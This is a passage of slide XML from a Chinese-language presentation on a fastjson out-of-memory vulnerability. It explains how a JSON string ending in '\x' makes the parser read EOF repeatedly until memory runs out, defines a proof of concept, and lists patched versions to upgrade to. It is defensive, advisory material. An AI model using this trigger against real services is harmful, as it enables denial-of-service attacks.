            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3077" name="Picture 5" descr="public_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682" y="4988752"/>
            <a:ext cx="22181574" cy="7923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07860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20679"/>
            <a:ext cx="6871113" cy="11970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en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t>OOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1030682" y="2459820"/>
            <a:ext cx="22419253" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="squar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800" b="0"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rPr>
              <a:t>当json字符串是以</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0"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rPr>
              <a:t>结尾时，由于fastjson并未对其进行校验，将导致其继续尝试获取后两位的字符。也就是说会直接获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>\u001A</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0"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rPr>
              <a:t>也就是EOF：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="48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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6147" name="Picture 3" descr="public_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681" y="4277032"/>
            <a:ext cx="22419253" cy="8406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563270"/>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20679"/>
            <a:ext cx="6871113" cy="11970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en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t>OOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1030682" y="2400827"/>
            <a:ext cx="22389757" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="4572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800" b="0"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rPr>
              <a:t>当fastjson再次向后进行解析时，会不断重复获取EOF，并将其写到内存中，直到触发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>oom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>错误</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171" name="Picture 3" descr="public_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682" y="4258624"/>
            <a:ext cx="22438672" cy="8159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10260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20679"/>
            <a:ext cx="6871113" cy="11970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en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t>OOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2180914"/>
            <a:ext cx="22545368" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>poc:Proof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ofConcept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，中文意思是“观点证明”。这个短语会在漏洞报告中使用，漏洞报告中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>则是一段说明或者一个攻击的样例，使得读者能够确认这个漏洞是真实存在的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800"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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030681" y="5219700"/>
            <a:ext cx="22450611" cy="6962468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3572705935"/>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20679"/>
            <a:ext cx="6871113" cy="11970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en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t>OOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2949677"/>
            <a:ext cx="21091899" cy="7581652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3988652015"/>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20679"/>
            <a:ext cx="6871113" cy="11970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en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>OOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030681" y="2184008"/>
            <a:ext cx="22625731" cy="9879628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>修复建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.1.15~1.1.31</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本更新到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.1.31.sec07</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.1.32~1.1.33</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本更新到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.1.33.sec06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.1.34 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本更新到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.1.34.sec06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.1.35~1.1.46</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本更新到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.1.46.sec06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.2.3~1.2.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本更新到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.2.7.sec06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.2.8.sec04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.2.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本更新到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.2.8.sec06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.2.9~1.2.29 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本更新到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.2.29.sec06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>时间线</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
